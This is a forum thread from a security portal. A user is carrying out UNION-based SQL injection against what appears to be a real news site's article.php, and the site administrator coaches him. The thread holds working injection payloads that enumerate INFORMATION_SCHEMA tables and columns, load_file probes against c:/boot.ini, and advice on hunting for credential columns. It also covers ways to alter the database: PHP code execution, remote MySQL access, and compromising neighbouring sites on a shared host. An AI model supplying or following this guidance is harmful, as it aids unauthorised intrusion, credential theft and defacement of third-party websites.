Waraxe IT Security Portal  
  Login or Register
::  Home  ::  Search  ::  Your Account  ::  Forums  ::   Waraxe Advisories  ::  Tools  ::
September 17, 2019
Menu
 Home
 Logout
 Discussions
 Forums
 Members List
 IRC chat
 Tools
 Base64 coder
 MD5 hash
 CRC32 checksum
 ROT13 coder
 SHA-1 hash
 URL-decoder
 Sql Char Encoder
 Affiliates
 y3dips ITsec
 Md5 Cracker
 User Manuals
 AlbumNow
 Content
 Content
 Sections
 FAQ
 Top
 Info
 Feedback
 Recommend Us
 Search
 Journal
 Your Account



User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9145

People Online:
Visitors: 236
Members: 1
Total: 237

Online Now:
01: mranonx - Forums
PacketStorm News
Currently there is a problem with headlines from this site
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> All other security holes -> pro in SQL injection ??
Post new topic  Reply to topic View previous topic :: View next topic 
pro in SQL injection ??
PostPosted: Fri Jan 25, 2008 11:50 am Reply with quote
nox
Advanced user
Advanced user
 
Joined: Dec 29, 2007
Posts: 100
Location: c://windows/system32




Sad Hi

i find exploit SQl injection ,where i go to INFORMATION_SCHEMA.TABLES

I find all table db :

CHARACTER_SETS

COLLATIONS

COLLATION_CHARACTER_SET_APPLICABILITY

COLUMNS

COLUMN_PRIVILEGES

ENGINES

EVENTS

FILES

GLOBAL_STATUS

GLOBAL_VARIABLES

KEY_COLUMN_USAGE

PARTITIONS

PLUGINS

PROCESSLIST

REFERENTIAL_CONSTRAINTS

ROUTINES

SCHEMATA

SCHEMA_PRIVILEGES

SESSION_STATUS

SESSION_VARIABLES

STATISTICS

TABLES

TABLE_CONSTRAINTS

TABLE_PRIVILEGES

TRIGGERS

USER_PRIVILEGES

VIEWS

article

article_type

author

cricket_results

date

general

inv_tips

last_ping

mailing_list

m_type

mbb

poll

poll_data

dt_1

test1


when i put : FROM article

i find all Articles ID

but when i put : FROM USER_PRIVILEGES

Query failed == 1146: Table 'marketviews2.USER_PRIVILEGES' doesn't exist

plz Help me ? Confused

_________________
..::::[ Waraxe.us is the BEST and the TOP ]::::..
View user's profile Send private message Send e-mail Visit poster's website MSN Messenger
PostPosted: Fri Jan 25, 2008 5:26 pm Reply with quote
waraxe
Site admin
Site admin
 
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




You see all table names from all databases you have currently access. So those tables are coming from at least 2 databases: "INFORMATION_SCHEMA" and "marketviews2". Table "USER_PRIVILEGES" is residing in "INFORMATION_SCHEMA" database, not in your current database.

In your specific case, all UPPERCASE tables seems to be coming from "INFORMATION_SCHEMA" and lowercase tables are in current database.

So "USER_PRIVILEGES" can be accessed as "INFORMATION_SCHEMA.USER_PRIVILEGES"
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Sat Jan 26, 2008 10:31 am Reply with quote
nox
Advanced user
Advanced user
 
Joined: Dec 29, 2007
Posts: 100
Location: c://windows/system32




THankx Laughing Work 100% , but i can't find name of pass & User

look here :

from information_schema.TABLES

Code:
CHARACTER_SETS
COLLATIONS
COLLATION_CHARACTER_SET_APPLICABILITY
COLUMNS
COLUMN_PRIVILEGES
ENGINES
EVENTS
FILES
GLOBAL_STATUS
GLOBAL_VARIABLES
KEY_COLUMN_USAGE
PARTITIONS
PLUGINS
PROCESSLIST
REFERENTIAL_CONSTRAINTS
ROUTINES
SCHEMATA
SCHEMA_PRIVILEGES
SESSION_STATUS
SESSION_VARIABLES
STATISTICS
TABLES
TABLE_CONSTRAINTS
TABLE_PRIVILEGES
TRIGGERS
USER_PRIVILEGES
VIEWS
article
article_type
author
cricket_results
date
general
inv_tips
last_ping
mailing_list
msn_type
msnbb
poll
poll_data
dt_1
test1


mysql> select * from information_schema.USER_PRIVILEGES;
+-----------+---------------+----------------+--------------+
| GRANTEE | TABLE_CATALOG | PRIVILEGE_TYPE | IS_GRANTABLE |
+-----------+---------------+----------------+--------------+
| 'KK1'@'%' | NULL | USAGE | NO |
+-----------+---------------+----------------+--------------+
1 row in set (0.02 sec)

Code:
/article.phpID=-999 UNION SELECT 0,GRANTEE,2,3,4,5,6,7,8,IS_GRANTABLE FROM information_schema.USER_PRIVILEGES;


i find : 'KK1'@'%' and NO

PLZ how i can find PASSWORD ?????
Look here plz : http://www.xfocus.net/articles/200601/847.html

mysql> use information_schema;
Database changed
mysql> show tables;
+---------------------------------------+
| Tables_in_information_schema |
+---------------------------------------+
| CHARACTER_SETS |
| COLLATIONS |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS |
| COLUMN_PRIVILEGES |
| KEY_COLUMN_USAGE |
| ROUTINES |
| SCHEMATA |
| SCHEMA_PRIVILEGES |
| STATISTICS |
| TABLES |
| TABLE_CONSTRAINTS |
| TABLE_PRIVILEGES |
| TRIGGERS |
| VIEWS |
| USER_PRIVILEGES |
+---------------------------------------+
16 rows in set (0.17 sec)

mysql> select * from information_schema.USER_PRIVILEGES;
+-----------+---------------+----------------+--------------+
| GRANTEE | TABLE_CATALOG | PRIVILEGE_TYPE | IS_GRANTABLE |
+-----------+---------------+----------------+--------------+
| 'KK1'@'%' | NULL | USAGE | NO |
+-----------+---------------+----------------+--------------+
1 row in set (0.02 sec)

mysql> select TABLE_SCHEMA,TABLE_NAME,COLUMN_NAME from information_schema.STATIS
TICS;
+--------------+------------+-------------+
| TABLE_SCHEMA | TABLE_NAME | COLUMN_NAME |
+--------------+------------+-------------+
| in | article | articleid |
| in | user | userid |
+--------------+------------+-------------+
2 rows in set (0.02 sec)

D:\mysql5\bin>mysql -uroot -p
Enter password: ******
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 4 to server version: 5.0.18

Type 'help;' or '\h' for help. Type '\c' to clear the buffer.

mysql> use in
Database changed
mysql> delimiter //
mysql> CREATE PROCEDURE test(id INT)
-> BEGIN
-> SELECT * FROM in.USER WHERE USERID=ID;
-> END//
Query OK, 0 rows affected (0.08 sec)

mysql> delimiter ;

mysql> call test(1);
+--------+----------+----------+
| userid | username | password |
+--------+----------+----------+
| 1 | angel | mypass |
+--------+----------+----------+
1 row in set (0.00 sec)

Query OK, 0 rows affected (0.00 sec)


aSQL Injection

mysql> call test(1 and 1=1);
+--------+----------+----------+
| userid | username | password |
+--------+----------+----------+
| 1 | angel | mypass |
+--------+----------+----------+
1 row in set (0.00 sec)

Query OK, 0 rows affected (0.01 sec)

mysql> call test(1 and 1=2);
Empty set (0.00 sec)

Query OK, 0 rows affected (0.00 sec)


mysql> grant SELECT, INSERT, UPDATE, DELETE, EXECUTE
-> ON `IN`.*
-> TO 'KK1'@'%'
-> IDENTIFIED BY 'OBSCURE';
Query OK, 0 rows affected (0.03 sec)

SELECT, INSERT, UPDATE, DELETE, EXECUTE
D:\mysql5\bin>mysql -uKK1 -p
Enter password: ******
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 5 to server version: 5.0.18

Type 'help;' or '\h' for help. Type '\c' to clear the buffer.

mysql> select ROUTINE_SCHEMA,ROUTINE_NAME,DEFINER,ROUTINE_DEFINITION from inform
ation_schema.ROUTINES;
+----------------+--------------+----------------+--------------------+
| ROUTINE_SCHEMA | ROUTINE_NAME | DEFINER | ROUTINE_DEFINITION |
+----------------+--------------+----------------+--------------------+
| in | test | root@localhost | |
| in | tt | root@localhost | |
+----------------+--------------+----------------+--------------------+
2 rows in set (0.01 sec)


mysql> call in.test(1 and length(load_file('c:/boot.ini'))>0);
+--------+----------+----------+
| userid | username | password |
+--------+----------+----------+
| 1 | angel | mypass |
+--------+----------+----------+
1 row in set (0.00 sec)

Query OK, 0 rows affected (0.01 sec)

mysql> call in.test(1 and length(load_file('c:/boot.ini'))<0);
Empty set (0.00 sec)

Query OK, 0 rows affected (0.00 sec)



HELP ME WARAXE PLZ

_________________
..::::[ Waraxe.us is the BEST and the TOP ]::::..
View user's profile Send private message Send e-mail Visit poster's website MSN Messenger
PostPosted: Sat Jan 26, 2008 1:28 pm Reply with quote
waraxe
Site admin
Site admin
 
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




I don't think, that you will find any names or passwords in "INFORMATION_SCHEMA". Next move can be COLUMNS enumeration.

Code:

/article.phpID=-1 UNION ALL SELECT 0,TABLE_NAME,2,3,4,5,6,7,8,COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS;


Then search for tablenames and column names, which seems to be related with web application auth - anything like "user", "pass", "admin", "login", "account", "email", "editor", "customer", ...
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Sat Jan 26, 2008 1:33 pm Reply with quote
nox
Advanced user
Advanced user
 
Joined: Dec 29, 2007
Posts: 100
Location: c://windows/system32




ok , i dont find password , now i want to Edit article.php

command UPDATE ?


/UNION SELECT 0,1,2,3,4,5,6,7 FROM article--

it work Cool

ALL Column name of Article : title,.....

article:id

article:title

article:author_id

article:date_id

article:add_date

article:edit_date

article:intro

article:body

article:sort

article:link

article:image

article:type

article:status

article:sn_type

article:sn_status

Now tell me how i can Edit Article [ HTML ] UPDATE

thankx for all waraxe

_________________
..::::[ Waraxe.us is the BEST and the TOP ]::::..
View user's profile Send private message Send e-mail Visit poster's website MSN Messenger
PostPosted: Sat Jan 26, 2008 1:44 pm Reply with quote
waraxe
Site admin
Site admin
 
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




It's MySql 5.x, right ??

Then you can't use multiple queries in sql injection. Database modification can be done only with other methods:

1. Find sql injection in UPDATE query, which handles right table
2. Get php level access and execute your own sql queries
3. Find out database credentials and if port 3306 is open to world, try to manipulate database remotely (in most cases impossible, becasue MySql port usually is not open outside the internal network perimeter)
4. If web application has admin/editor backend interface, try to log in and make needed changes. Or elevate privileges from webapp admin/editor/author/moderator/etc to php code execution and then use your own sql queries.
5. If website is located in shared hosting server, then look for neighbour websites on same server and try to find weakest link in order to get access to server. If hosting server security measures are not tight enough, then you may be able to get access to all other website's files and databases ...
View user's profile Send private message Send e-mail Visit poster's website
pro in SQL injection ??
  www.waraxe.us Forum Index -> All other security holes
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT  
Page 1 of 1  

  
  
 Post new topic  Reply to topic  




Powered by phpBB 2001-2008 phpBB Group






Game Hints
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2013 Janek Vind "waraxe"
Page Generation: 0.092 Seconds